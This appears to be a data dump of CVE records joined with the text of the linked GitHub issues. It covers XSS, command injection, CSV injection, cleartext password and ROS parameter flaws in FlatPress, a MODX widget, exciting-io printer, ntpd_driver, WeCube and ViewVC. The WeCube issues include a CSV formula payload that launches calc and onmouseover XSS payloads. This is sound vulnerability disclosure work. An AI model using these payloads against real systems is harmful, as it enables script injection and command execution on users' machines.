"Patch",
"Third Party Advisory"
] | github.com | [
"flatpressblog",
"flatpress"
] | Addon for #172: Uploaded XML and Markdown files may contain malicious JS as well. | Possible XSS in Uploader | https://api.github.com/repos/flatpressblog/flatpress/issues/178/comments | 0 | 2022-12-25T13:40:38Z | 2022-12-25T13:42:13Z | https://github.com/flatpressblog/flatpress/issues/178 | 1,510,331,228 | 178 | 4,565 |
CVE-2022-4822 | 2022-12-28T21:15:11.017 | A vulnerability, which was classified as problematic, has been found in FlatPress. This issue affects some unknown processing of the file setup/lib/main.lib.php of the component Setup. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 5f23b4c2eac294cc0ba5e541f83a6f8a26f9fed1. It is recommended to apply a patch to fix this issue. The identifier VDB-217001 was assigned to this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 2.4,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/commit/5f23b4c2eac294cc0ba5e541f83a6f8a26f9fed1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/issues/176"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.217001"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.217001"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/commit/5f23b4c2eac294cc0ba5e541f83a6f8a26f9fed1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/issues/176"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.217001"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.217001"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flatpress:flatpress:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CD0F1B05-3B1E-4527-9AE3-488578A1ADCE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/flatpressblog/flatpress/issues/176 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"flatpressblog",
"flatpress"
] | FlatPress installer allows for possible XSS due to unsufficient input sanitation. (Details follow.) | Possible XSS in setup | https://api.github.com/repos/flatpressblog/flatpress/issues/176/comments | 0 | 2022-12-25T13:15:16Z | 2022-12-25T13:16:30Z | https://github.com/flatpressblog/flatpress/issues/176 | 1,510,326,361 | 176 | 4,566 |
CVE-2017-20155 | 2022-12-30T23:15:08.883 | A vulnerability was found in Sterc Google Analytics Dashboard for MODX up to 1.0.5. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file core/components/analyticsdashboardwidget/elements/tpl/widget.analytics.tpl of the component Internal Search. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.0.6 is able to address this issue. The identifier of the patch is 855d9560d3782c105568eedf9b22a769fbf29cc0. It is recommended to upgrade the affected component. The identifier VDB-217069 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/Sterc/Analytics-dashboard-widget/commit/855d9560d3782c105568eedf9b22a769fbf29cc0"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Sterc/Analytics-dashboard-widget/issues/11"
},
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://github.com/Sterc/Analytics-dashboard-widget/milestone/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/Sterc/Analytics-dashboard-widget/pull/12"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.217069"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.217069"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/Sterc/Analytics-dashboard-widget/commit/855d9560d3782c105568eedf9b22a769fbf29cc0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Sterc/Analytics-dashboard-widget/issues/11"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/Sterc/Analytics-dashboard-widget/milestone/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/Sterc/Analytics-dashboard-widget/pull/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.217069"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.217069"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sterc:google_analytics_dashboard_for_modx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "41021BB5-14F4-4C48-8C4A-7376B9703258",
"versionEndExcluding": null,
"versionEndIncluding": "1.0.5",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/Sterc/Analytics-dashboard-widget/issues/11 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Sterc",
"Analytics-dashboard-widget"
] | It is possible to execute in-manager javascript when tracking internal site-search with Google Analytics. The javascript you search for will be saved by Google Analaytics. Which in turn will be read-out by the Dashboard Widget. Executing javascript would be possible here.

| XSS for internal search queries | https://api.github.com/repos/Sterc/Analytics-dashboard-widget/issues/11/comments | 0 | 2017-03-08T14:23:18Z | 2017-03-09T08:10:15Z | https://github.com/Sterc/Analytics-dashboard-widget/issues/11 | 212,747,556 | 11 | 4,567 |
CVE-2017-20156 | 2022-12-31T10:15:09.183 | A vulnerability was found in Exciting Printer and classified as critical. This issue affects some unknown processing of the file lib/printer/jobs/prepare_page.rb of the component Argument Handler. The manipulation of the argument URL leads to command injection. The patch is named 5f8c715d6e2cc000f621a6833f0a86a673462136. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217139. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 5.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/exciting-io/printer/commit/5f8c715d6e2cc000f621a6833f0a86a673462136"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/exciting-io/printer/issues/56"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.217139"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.217139"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/exciting-io/printer/commit/5f8c715d6e2cc000f621a6833f0a86a673462136"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/exciting-io/printer/issues/56"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.217139"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.217139"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:printer_project:printer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C9AE5D0C-92AB-4BC2-82D2-FAC3DFB02051",
"versionEndExcluding": "2017-07-08",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"77"
] | 77 | https://github.com/exciting-io/printer/issues/56 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"exciting-io",
"printer"
] | The backend server has a bash injection vulnerability. The URL to print is not correctly escaped.
See:
https://github.com/exciting-io/printer/blob/master/lib/printer/jobs/prepare_page.rb#L39 | Bash injection vulnerability | https://api.github.com/repos/exciting-io/printer/issues/56/comments | 1 | 2017-07-01T00:11:11Z | 2017-07-08T10:33:06Z | https://github.com/exciting-io/printer/issues/56 | 239,913,590 | 56 | 4,568 |
CVE-2022-48198 | 2023-01-01T07:15:10.187 | The ntpd_driver component before 1.3.0 and 2.x before 2.2.0 for Robot Operating System (ROS) allows attackers, who control the source code of a different node in the same ROS application, to change a robot's behavior. This occurs because a topic name depends on the attacker-controlled time_ref_topic parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/vooon/ntpd_driver/compare/1.2.0...1.3.0"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/vooon/ntpd_driver/compare/2.1.0...2.2.0"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/vooon/ntpd_driver/issues/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/vooon/ntpd_driver/compare/1.2.0...1.3.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/vooon/ntpd_driver/compare/2.1.0...2.2.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/vooon/ntpd_driver/issues/9"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ntpd_driver_project:ntpd_driver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8EB88AF8-C1A9-48C4-874E-16E4B631AE6D",
"versionEndExcluding": "1.3.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ntpd_driver_project:ntpd_driver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9BE4BD13-56AC-4C1F-A575-37BD38C006F9",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:openrobotics:robot_operating_system:-:*:*:*:*:*:*:*",
"matchCriteriaId": "BFEE12D7-4A38-466E-B8E0-D0FADBC00CE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
] | [
"668"
] | 668 | https://github.com/vooon/ntpd_driver/issues/9 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"vooon",
"ntpd_driver"
] | Hi,
We notice that you are using topic name from ROS parameter at the following locations:
https://github.com/vooon/ntpd_driver/blob/b8b9e1d4cc6473a353e469859bf0477c6a8d108e/src/shm_driver.cpp#L230
For security reasons detailed below, we strongly suggest avoiding the usage of strings from parameters as topic name.
Although parameters are usually set in parameter files, they can also be changed by nodes. Specifically, other nodes in the same ROS application can also change the parameters listed above before it’s used, either by accident or *intentionally* (i.e., by potential attackers). If the `~/time_ref_topic` parameter is changed, the *shm_driver* node will subscribe to a wrong topic, which can interrupt the sending of TimeReference message. If an attacker exists, she can control the time by first fooling the *shm_driver* node to subscribe to a wrong topic like `~/time_ref_fake`, and then forwarding messages from topic `~/time_ref` to `~/time_ref_fake` after changing the contents. The robot’s behavior may be changed in various ways based on what the downstream applications are that read from the ntpd. Because ROS is an OSS (open-source software) community, third-party nodes are widely used in ROS applications, usually without complete vetting of their behavior, which gives the opportunity to potentially malicious actors to inject malicious code (e.g, by submitting hypocrite commits like in other OSS systems [1]) to infiltrate the ROS applications that use it (or software supply chain attacks, one of the primary means for real-world attackers today [2]).
We understand that using parameters to set topic names brings flexibility. Still, for the purpose of security, we strongly suggest that you avoid such vulnerable programming patterns if possible. For example, to avoid the exposure of this specific vulnerability, you may consider alternatives like remapping, which is designed for configuring names when launching the nodes.
[1] Q. Wu and K. Lu, “On the feasibility of stealthily introducing vulnerabilities in open-source software via hypocrite commits,” 2021, https://linuxreviews.org/images/d/d9/OpenSourceInsecurity.pdf.
[2] Supply chain attacks are the hacker’s new favourite weapon. and the threat is getting bigger. https://www.zdnet.com/article/supply-chain-attacks-are-the-hackers-new-favourite-weapon-and-the-threat-is-getting-bigger/. | Potential vulnerability: topic name from ROS parameter | https://api.github.com/repos/vooon/ntpd_driver/issues/9/comments | 1 | 2022-12-28T01:44:11Z | 2022-12-30T11:29:17Z | https://github.com/vooon/ntpd_driver/issues/9 | 1,512,315,340 | 9 | 4,569 |
CVE-2022-37785 | 2023-01-01T08:15:10.277 | An issue was discovered in WeCube Platform 3.2.2. Cleartext passwords are displayed in the configuration for terminal plugins. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-platform/issues/2329"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-plugins-terminal"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-platform/issues/2329"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-plugins-terminal"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wecube-platform_project:wecube-platform:3.2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "22436A82-9598-4CD2-8DAB-E8F970DB3613",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"312"
] | 312 | https://github.com/WeBankPartners/wecube-platform/issues/2329 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"WeBankPartners",
"wecube-platform"
] | **描述您遇到的bug**
terminal plugin <= v1.0.2,該密碼已明文顯示
**如何重现**
訪問至terminal plugin的configuratioin檔案
**预期行为**
顯示明文密碼,攻擊者可能透過這資訊ssh連線至主機
**截图**

**附加**
| CWE-312 Cleartext Storage of Sensitive Information | https://api.github.com/repos/WeBankPartners/wecube-platform/issues/2329/comments | 0 | 2022-08-05T12:36:30Z | 2022-08-05T12:36:30Z | https://github.com/WeBankPartners/wecube-platform/issues/2329 | 1,329,882,829 | 2,329 | 4,570 |
CVE-2022-37786 | 2023-01-01T08:15:10.330 | An issue was discovered in WeCube Platform 3.2.2. There are multiple CSV injection issues: the [Home / Admin / Resources] page, the [Home / Admin / System Params] page, and the [Home / Design / Basekey Configuration] page. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-platform"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-platform/issues/2327"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-platform"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-platform/issues/2327"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wecube-platform_project:wecube-platform:3.2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "22436A82-9598-4CD2-8DAB-E8F970DB3613",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1236"
] | 1236 | https://github.com/WeBankPartners/wecube-platform/issues/2327 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"WeBankPartners",
"wecube-platform"
] | **描述您遇到的bug**
webcute v3.2.2
在這些page上存在CSV injection
[Home / Admin / Resources] page
[Home / Admin / System Params] page
[Home / Design / Basekey Configuration] page
**如何重现**
input
`
=10+20+cmd|' /C calc'!A0
`
並export csv出來,在使用windows系統開啟
**预期行为**
跳出程式calc.exe
**截图**


**附加**
| CWE-1236: Improper Neutralization of Formula Elements in a CSV File | https://api.github.com/repos/WeBankPartners/wecube-platform/issues/2327/comments | 0 | 2022-08-05T12:27:59Z | 2022-08-05T12:33:46Z | https://github.com/WeBankPartners/wecube-platform/issues/2327 | 1,329,873,785 | 2,327 | 4,571 |
CVE-2022-37787 | 2023-01-01T08:15:10.383 | An issue was discovered in WeCube platform 3.2.2. A DOM XSS vulnerability has been found on the plugin database execution page. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-platform"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-platform/issues/2328"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-platform"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/WeBankPartners/wecube-platform/issues/2328"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wecube-platform_project:wecube-platform:3.2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "22436A82-9598-4CD2-8DAB-E8F970DB3613",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/WeBankPartners/wecube-platform/issues/2328 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"WeBankPartners",
"wecube-platform"
] | **描述您遇到的bug**
DOM XSS存在資料庫查詢語句中,wecube v3.2.2
**如何重现**
`
輸入
select < b onmouseover="window['ale'+'rt']('DOM XSS')">hello
或
select < b onmouseover='alert("XSS")'>hello
`
Notes:請刪除< 空格
**预期行为**
javascript允許執行,可以竊取cookie
**截图**


**附加**
| CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | https://api.github.com/repos/WeBankPartners/wecube-platform/issues/2328/comments | 0 | 2022-08-05T12:31:46Z | 2022-08-05T12:33:20Z | https://github.com/WeBankPartners/wecube-platform/issues/2328 | 1,329,877,795 | 2,328 | 4,572 |
CVE-2023-22456 | 2023-01-03T19:15:10.483 | ViewVC, a browser interface for CVS and Subversion version control repositories, as a cross-site scripting vulnerability that affects versions prior to 1.2.2 and 1.1.29. The impact of this vulnerability is mitigated by the need for an attacker to have commit privileges to a Subversion repository exposed by an otherwise trusted ViewVC instance. The attack vector involves files with unsafe names (names that, when embedded into an HTML stream, would cause the browser to run unwanted code), which themselves can be challenging to create. Users should update to at least version 1.2.2 (if they are using a 1.2.x version of ViewVC) or 1.1.29 (if they are using a 1.1.x version).
ViewVC 1.0.x is no longer supported, so users of that release lineage should implement a workaround. Users can edit their ViewVC EZT view templates to manually HTML-escape changed paths during rendering. Locate in your template set's `revision.ezt` file references to those changed paths, and wrap them with `[format "html"]` and `[end]`. For most users, that means that references to `[changes.path]` will become `[format "html"][changes.path][end]`. (This workaround should be reverted after upgrading to a patched version of ViewVC, else changed path names will be doubly escaped.) | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/viewvc/viewvc/issues/311"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/viewvc/viewvc/releases/tag/1.1.29"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/viewvc/viewvc/releases/tag/1.2.2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/viewvc/viewvc/security/advisories/GHSA-j4mx-f97j-gc5g"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
